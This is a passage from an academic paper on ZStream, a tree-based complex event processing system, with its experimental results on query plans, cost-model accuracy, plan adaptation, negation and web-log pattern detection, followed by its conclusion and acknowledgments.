better performance. To exclude the effect of selectivity, we experiment on a simple sequential pattern (Query 5) without any predicates. Query 5. Sequence Pattern “IBM; Sun; Oracle” PATTERN IBM; Sun; Oracle WITHIN 200 units Figure 10 shows the throughput for three plans (left-deep, right-deep and NFA-based) for Query 5 where we vary the relative event rate between IBM and the other two event classes. When IBM has a higher event rate, the right-deep plan performs the best, since IBM is joined later in this plan. The left-deep plan becomes best when IBM’s event rate starts drops lower than the other two, since IBM is joined earlier in this plan. Figure 11 shows the estimated cost of the left-deep and the right-deep plan with varying relative rates, which turns out with the similar performance behavior as the real running throughput. One additional observation from Figures 10 and 11 is that the performance gap between the best and worst performing plans on the right side of the figures is greater. These represent plans where there is a lower relative event rate for a single event class. Consider the case where event rate is 1 : 1 : 1. In this case, the performance of all the plans is the same. Now, decreasing a single event class’s rate by a factor of $k$ is equivalent to increasing each of the other event classes’ event rates by a factor of $k$. This results in a factor of $k^{N-1}$ (where $N$ is the total number of event classes) skew in the event distribution. In comparison, on the left side of the figure, increasing the rate of one stream only increases skew by a factor of $k$. Figure 9: $1/estimated \ cost$ of different plans for Query 4 with varying selectivity Figure 8: Throughputs of different plans for Query 4 with varying selectivity Figure 10: Throughputs of different plans for Query 5 with varying relative event rates Figure 11: $1/estimated \ cost$ of different plans for Query 5 with varying relative event rates 6.2 Optimal Plans in More Complex Queries and Memory Usage In this section, we show that the performance of different physical plans can vary dramatically when statistics change. The experiment is conducted using Query 6, running four different query plans and the NFA based approach. Query 6. More Complex Query PATTERN IBM; Sun; Oracle; Google WHERE Oracle.price > Sun.price AND Oracle.price > Google.price WITHIN 100 units The plans are: 1. Left-deep Plan: [[IBM; Sun]; Oracle; Google] 2. Right-deep Plan: [IBM; Sun; [Oracle; Google]] 3. Bushy Plan: [[IBM; Sun; [Oracle; Google]] 4. Inner Plan: [IBM; [Sun; Oracle]; Google] 5. NFA We varied the event rate and selectivity of the different streams to show that the optimal plan changes quite dramatically. Figure 12 illustrates the throughput of the four plans with varying selectivity and relative event rate. For these experiments, we vary the proportion of inputs from different streams (from its default of 1 : 1 : 1 : 1), as well as the selectivities of the two query predicates (from their default of 1). When the IBM event rate is low, as shown in the left most cluster of bars (rate = 1 : 100 : 100 : 100), the left-deep plan does best. The bushy plan also does well because it also uses IBM in the first (bottommost) operator. The right-deep plan, inner plan and NFA perform poorly because they combine with IBM in a later operator. In the second case where the first predicate (between Sun and Oracle) is very selective (sel1 = 1/50), the inner plan (which evaluates the first predicate first) does best, and it is almost two times faster than the other plans. The bushy plan in this case does extremely poorly because it defers the evaluation of the first predicate until the final processing step. The third case is good for the right-deep plan and the NFA-based approach because the predicate between the last two event classes is selective (sel2 = 1/50). As expected, the left-deep plan does poorly in this case. Figure 13 shows the estimates from our cost model (for all plans except NFA), showing that it predicts the real performance behavior well. Based on the cost model, our dynamic programming algorithm (Algorithm 5) should be able select the optimal plan efficiently. Table 3 shows the peak memory consumption by the five plans for Query 6 in two cases: 1). when the IBM event rate is very low (rate = 1 : 100 : 100 : 100); and 2). when the predicate between Sun and Oracle is very selective (sel1 = 1/50). As can be indicated form Table 3, the peak memory consumption is relatively stable among different plans (much more stable than the throughput of these different plans). In general, the memory consumption is independent of the input data size. It is the type of the query (pattern length, operator type and time window constraints) and data features (selectivity and event rate) that affect and bound the memory usage. 6.3 Plan Adaptation In this section, we describe experiments that test ZStream’s plan adaptation features (described in Section 5.3), as well as our dynamic programming algorithm. For these experiments, we concatenated the three streams used in the previous experiment together and ran query 6 again. In this concatenated stream the rate of IBM is initially 100x less than the other stocks and the selectivities are both set to 1; then, the IBM rate become equal to the others but the selectivity of the first predicate goes to 1/50: Table 3: Peak Memory Usage(in MB) for Query 6 <table> <thead> <tr> <th>Plan</th> <th>rate = 1 : 100 : 100 : 100</th> <th>rate = 1/50</th> </tr> </thead> <tbody> <tr> <td>Left-deep</td> <td>7.36</td> <td>7.96</td> </tr> <tr> <td>Right-deep</td> <td>7.45</td> <td>6.91</td> </tr> <tr> <td>Bushy</td> <td>6.72</td> <td>6.73</td> </tr> <tr> <td>Inner</td> <td>7.85</td> <td>6.47</td> </tr> <tr> <td>NFA</td> <td>6.70</td> <td>6.55</td> </tr> </tbody> </table> finally, the selectivity of the first predicate returns to 1, but the selectivity of the second predicate goes to $1/50$. We compared the performance of our adaptive, dynamic programming based algorithm which continuously monitors selectivities and rates to the same fixed plans used in the previous experiment (we omit bushy for clarity in the figure.) Figure 14 shows the results, with throughput on the $Y$ axis and the time on the $X$ axis (with the stream parameters changing at the tick marks). We show three points for each approach. These points represent the average throughput for the three stream segments corresponding to the three varying sets of parameters. Notice that the adaptive algorithm is able to select a plan that is nearly as good as the best of the other plans. The performance of left-deep, right-deep, inner, and NFA is similar to the results shown in Figure 12. 6.4 Negation Push Down As discussed earlier, one way to evaluate negation queries is to put a negation filter $\text{NEG}$ on top of the entire query plan, and filter out the negated composite events as a postfiltering step. The alternative approach is to use the $\text{NSEQ}$ operator to directly incorporate negation into the query plan tree. We compare the performance of these two methods in this section on Query 7: **Query 7.** Negation Pattern “IBM; !Sun; Oracle” <table> <thead> <tr> <th>PATTERN</th> <th>IBM: !Sun; Oracle</th> </tr> </thead> <tbody> <tr> <td>WITHIN</td> <td>200 units</td> </tr> </tbody> </table> The experiment is run on two query plans: 1. **Plan 1:** Use an $\text{NSEQ}$ operator to combine $\text{Sun}$ and $\text{Oracle}$ first. Then a $\text{SEQ}$ operator is applied to combine $\text{IBM}$ with the results from the $\text{NSEQ}$. 2. **Plan 2:** Use a $\text{SEQ}$ operator to combine $\text{IBM}$ and $\text{Oracle}$ first. Then a negation filter $\text{NEG}$ is applied to rule out the ($\text{IBM},\text{Oracle}$) pairs where $\text{Sun}$ events occurred in between. Figure 15 and 16 illustrate the results for these two plans with varying relative event rates. In both figures, Plan 1 always outperforms Plan 2. When the event distribution is skewed, the performance increases faster for Plan 2 because it generates many fewer intermediate results compared to Plan 1. As shown in Figure 15, however, when $\text{Oracle}$ event rates increase, the throughput of Plan 1 decreases slightly. This is due to the way in which $\text{NSEQ}$ works. As shown in Algorithm 2, $\text{NSEQ}$ matches each $\text{Oracle}$ event $o$ with the latest $\text{Sun}$ event before $o$. Hence, increasing the rate of $\text{Oracle}$ will affect the amount of computation done by $\text{NSEQ}$, which counteracts the benefits introduced by the biased distribution here (we observe similar results when increasing the $\text{IBM}$ event rates). Another observation is that the throughput of the Plan 2 increases much more quickly when the event distribution is biased towards $\text{Sun}$ events. This is because the Plan 2 combines $\text{IBM}$ and $\text{Oracle}$ first. The distribution biased on $\text{Sun}$ will result in relatively fewer ($\text{IBM},\text{Oracle}$) pairs. 6.5 Web Access Pattern Detection In this section, we demonstrate the efficiency of ZStream on real word log data. The web log data contains one month period (from 22/Feb/2009 to 22/Mar/2009) of more than 1.5 million web access records from MIT DB Group web server. The records have the schema (Time, IP, Access-URL, Description). **Query 8.** Web Access Pattern “Publication; Project; Course” <table> <thead> <tr> <th>PATTERN</th> <th>Publication; Project; Course</th> </tr> </thead> <tbody> <tr> <td>WHERE</td> <td>same IP address</td> </tr> <tr> <td>WITHIN</td> <td>10 hours</td> </tr> </tbody> </table> In this data, we observed that some users who are downloading publications from our server are also interested in the web pages for research projects and courses offered by our group. To detect users with this access pattern, we wrote Query 8. We chose a sequential pattern here instead of a conjunction pattern because we wanted to compare with the performance of NFA, which doesn’t support conjunction. The statistics of the number of records that access these different file types are shown in Table 4. Table 4: Number of Records Accessing Publications, Projects, and Courses <table> <thead> <tr> <th># of accesses</th> <th>publication</th> <th>project</th> <th>courses</th> </tr> </thead> <tbody> <tr> <td>975</td> <td>11610</td> <td>16083</td> <td></td> </tr> </tbody> </table> Figure 17: Throughputs of different plans for Query 8 on one month web access log data Table 5: Peak Memory Usage (in MB) for Query 8 <table> <thead> <tr> <th>Peak Mem(MB)</th> <th>left-deep</th> <th>right-deep</th> <th>NFA</th> </tr> </thead> <tbody> <tr> <td></td> <td>10.13</td> <td>10.66</td> <td>10.55</td> </tr> </tbody> </table> much smaller than the number of accesses to projects and courses as shown in Table 4. Hence many fewer intermediate results are generated by the left deep plan. This is consistent with the results from Section 6.1.2. NFA is a little slower than right-deep plan because we do not materialize for NFA, which is relatively important in this case because Query 8 has a very long time window (10 hours) and most of materialized intermediate tuples can be reused. The peak memory usage for these three plans is shown in Table 5. 7. CONCLUSION This paper presented ZStream, a high performance CEP system designed and implemented to efficiently process sequential patterns. ZStream is also able to support other relations such as conjunction, disjunction, negation and Kleene Closure. Unlike previous systems that evaluate CEP queries in a fixed order using NFAs, ZStream uses a tree-based plan for both the logical and physical representation of query patterns. A single pattern may have several equivalent physical tree plans, with different evaluation costs. Hence, we proposed a cost model to estimate the computation cost of a plan. Our experiments showed that the cost model can capture the real evaluation cost of a query plan accurately. Based on this cost model and using a simple set of statistics about operator selectivity and data rates, we showed that ZStream is able to adjust the order in which it detects patterns on the fly. In addition to these performance benefits, a tree-based infrastructure allows ZStream to unify the evaluation of sequences, conjunctions, disjunctions, sequential negations and Kleene Closures as variants of the join operator. This formulation allows flexible operator ordering and intermediate result materialization. 8. ACKNOWLEDGMENTS We thank Brian Cooper, Donald Kossmann and other reviewers for their invaluable suggestions to this paper. We also thank Michael Stonebraker for his insightful advice for us. This work was supported under NSF Grant NETS-NOSS 0520032. 9. REFERENCES
{"Source-Url": "https://dspace.mit.edu/bitstream/handle/1721.1/72190/Madden_Zstream.pdf;sequence=1", "len_cl100k_base": 15699, "olmocr-version": "0.1.49", "pdf-total-pages": 15, "total-fallback-pages": 0, "total-input-tokens": 59786, "total-output-tokens": 17284, "length": "2e13", "weborganizer": {"__label__adult": 0.0003337860107421875, "__label__art_design": 0.0005254745483398438, "__label__crime_law": 0.00041794776916503906, "__label__education_jobs": 0.0017642974853515625, "__label__entertainment": 0.00018036365509033203, "__label__fashion_beauty": 0.0002009868621826172, "__label__finance_business": 0.0009703636169433594, "__label__food_dining": 0.0003714561462402344, "__label__games": 0.0008378028869628906, "__label__hardware": 0.0018453598022460935, "__label__health": 0.0004622936248779297, "__label__history": 0.0004377365112304687, "__label__home_hobbies": 0.00013911724090576172, "__label__industrial": 0.0007200241088867188, "__label__literature": 0.0004456043243408203, "__label__politics": 0.0003662109375, "__label__religion": 0.0005002021789550781, "__label__science_tech": 0.271728515625, "__label__social_life": 0.00011366605758666992, "__label__software": 0.033660888671875, "__label__software_dev": 0.68310546875, "__label__sports_fitness": 0.00021839141845703125, "__label__transportation": 0.0005831718444824219, "__label__travel": 0.0002275705337524414}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 67282, 0.03245]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 67282, 0.41805]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 67282, 0.90627]], "google_gemma-3-12b-it_contains_pii": [[0, 713, false], [713, 5412, null], [5412, 8304, null], [8304, 13918, null], [13918, 20693, null], [20693, 26515, null], [26515, 30690, null], [30690, 33385, null], [33385, 39122, null], [39122, 48552, null], [48552, 51497, null], [51497, 54868, null], [54868, 58590, null], [58590, 63065, null], [63065, 67282, null]], "google_gemma-3-12b-it_is_public_document": [[0, 713, true], [713, 5412, null], [5412, 8304, null], [8304, 13918, null], [13918, 20693, null], [20693, 26515, null], [26515, 30690, null], [30690, 33385, null], [33385, 39122, null], [39122, 48552, null], [48552, 51497, null], [51497, 54868, null], [54868, 58590, null], [58590, 63065, null], [63065, 67282, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 67282, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 67282, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 67282, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 67282, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 67282, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 67282, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 67282, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 67282, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 67282, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 67282, null]], "pdf_page_numbers": [[0, 713, 1], [713, 5412, 2], [5412, 8304, 3], [8304, 13918, 4], [13918, 20693, 5], [20693, 26515, 6], [26515, 30690, 7], [30690, 33385, 8], [33385, 39122, 9], [39122, 48552, 10], [48552, 51497, 11], [51497, 54868, 12], [54868, 58590, 13], [58590, 63065, 14], [63065, 67282, 15]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 67282, 0.07767]]}
olmocr_science_pdfs
2024-11-24
2024-11-24